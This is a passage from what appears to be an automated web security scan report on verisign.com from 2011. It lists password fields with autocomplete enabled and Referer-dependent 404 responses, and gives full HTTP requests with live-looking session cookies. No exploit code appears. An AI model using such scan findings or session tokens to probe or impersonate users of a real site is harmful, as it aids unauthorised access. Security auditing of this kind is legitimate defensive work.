   <!--HEADER ASSETS
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.36. http://www.verisign.com/partners/ssl-reseller-programs/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /partners/ssl-reseller-programs/index.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /partners/ssl-reseller-programs/index.html HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623565|PC#1315621455064-973488.19#1378693705|check#true#1315621765

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:28:13 GMT
Content-Type: text/html
Content-Length: 51846

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>    
   <!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.37. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /partners/ssl-reseller-programs/resell-ssl/enrollment/index.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /partners/ssl-reseller-programs/resell-ssl/enrollment/index.html HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui-tabs-[object Object]=0; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623590|PC#1315621455064-973488.19#1378693730|check#true#1315621790; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; IS3_History=1315509977-2-99____; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.9.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:28:24 GMT
Content-Type: text/html
Content-Length: 34515

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>    
   <!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.38. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /partners/ssl-reseller-programs/resell-ssl/index.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /partners/ssl-reseller-programs/resell-ssl/index.html HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui-tabs-[object Object]=0; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623583|PC#1315621455064-973488.19#1378693723|check#true#1315621783; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.8.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509963-1-99____; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:28:19 GMT
Content-Type: text/html
Content-Length: 37523

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>    
   <!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.39. http://www.verisign.com/ssl/buy-ssl-certificates/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /ssl/buy-ssl-certificates/index.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /ssl/buy-ssl-certificates/index.html HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:59:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:59:43 GMT
Content-Type: text/html
Content-Length: 104571

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<META HTTP-EQUIV="X-UA-Compatible" CONTENT="IE=EmulateIE7" />

   <!--HEADER ASSETS-->
       <link href="ht
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.40. http://www.verisign.com/trust-seal/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /trust-seal/index.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /trust-seal/index.html?tid=gnps HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:26:13 GMT
Content-Type: text/html
Content-Length: 49851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="X-UA-Comp
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.41. http://www.verisign.com/verisign-worldwide/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /verisign-worldwide/index.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /verisign-worldwide/index.html?tid=footer HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:26:10 GMT
Content-Type: text/html
Content-Length: 42646

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
   <head>
               
   <!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.42. https://www.verisign.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /

Issue detail

The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled: password

Request

GET / HTTP/1.1
Host: www.verisign.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:30:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:30:44 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 34637

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

11.43. https://www.verisign.com/products-services/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /products-services/index.html

Issue detail

The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled: password

Request

GET /products-services/index.html HTTP/1.1
Host: www.verisign.com
Connection: keep-alive
Referer: https://securitycenter.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:27:46 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 107427

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

   <!--HEADER ASSETS-->
       <link href="https://cdn.verisign.com/assets/shared/css/header.css" rel="styleshee
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

12. Referer-dependent response
There are 7 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.



12.1. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/arrow_red.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blogs.verisign.com
Path:   /authweb/global/assets/shared/images/nav/arrow_red.png

Request 1

GET /authweb/global/assets/shared/images/nav/arrow_red.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Connection: close
Content-Length: 1159

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>


The requested URL was not found on this server.


The link on the
<a href="http://blogs.verisign.com/%3ftid=footer">referring
page</a> seems to be wrong or outdated. Please inform the author of
<a href="http://blogs.verisign.com/%3ftid=footer">that page</a>
about the error.



</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:root@localhost">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">blogapp</a><br />

<span>Fri Sep 9 21:26:10 2011<br />
Apache</span>
</address>
</body>
</html>

Request 2

GET /authweb/global/assets/shared/images/nav/arrow_red.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:26:16 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Connection: close
Content-Length: 996

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>


The requested URL was not found on this server.


If you entered the URL manually please check your
spelling and try again.



</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:root@localhost">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">blogapp</a><br />

<span>Fri Sep 9 21:26:16 2011<br />
Apache</span>
</address>
</body>
</html>


12.2. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/arrow_white.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blogs.verisign.com
Path:   /authweb/global/assets/shared/images/nav/arrow_white.png

Request 1

GET /authweb/global/assets/shared/images/nav/arrow_white.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Connection: close
Content-Length: 1159

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>


The requested URL was not found on this server.


The link on the
<a href="http://blogs.verisign.com/%3ftid=footer">referring
page</a> seems to be wrong or outdated. Please inform the author of
<a href="http://blogs.verisign.com/%3ftid=footer">that page</a>
about the error.



</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:root@localhost">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">blogapp</a><br />

<span>Fri Sep 9 21:26:10 2011<br />
Apache</span>
</address>
</body>
</html>

Request 2

GET /authweb/global/assets/shared/images/nav/arrow_white.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:26:16 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Connection: close
Content-Length: 996

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>


The requested URL was not found on this server.


If you entered the URL manually please check your
spelling and try again.



</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:root@localhost">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">blogapp</a><br />

<span>Fri Sep 9 21:26:16 2011<br />
Apache</span>
</address>
</body>
</html>


12.3. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blogs.verisign.com
Path:   /authweb/global/assets/shared/images/nav/nav_grad.png

Request 1

GET /authweb/global/assets/shared/images/nav/nav_grad.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Connection: close
Content-Length: 1159

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>


The requested URL was not found on this server.


The link on the
<a href="http://blogs.verisign.com/%3ftid=footer">referring
page</a> seems to be wrong or outdated. Please inform the author of
<a href="http://blogs.verisign.com/%3ftid=footer">that page</a>
about the error.



</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:root@localhost">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">blogapp</a><br />

<span>Fri Sep 9 21:26:10 2011<br />
Apache</span>
</address>
</body>
</html>

Request 2

GET /authweb/global/assets/shared/images/nav/nav_grad.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:26:17 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Connection: close
Content-Length: 996

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>


The requested URL was not found on this server.


If you entered the URL manually please check your
spelling and try again.



</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:root@localhost">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">blogapp</a><br />

<span>Fri Sep 9 21:26:17 2011<br />
Apache</span>
</address>
</body>
</html>


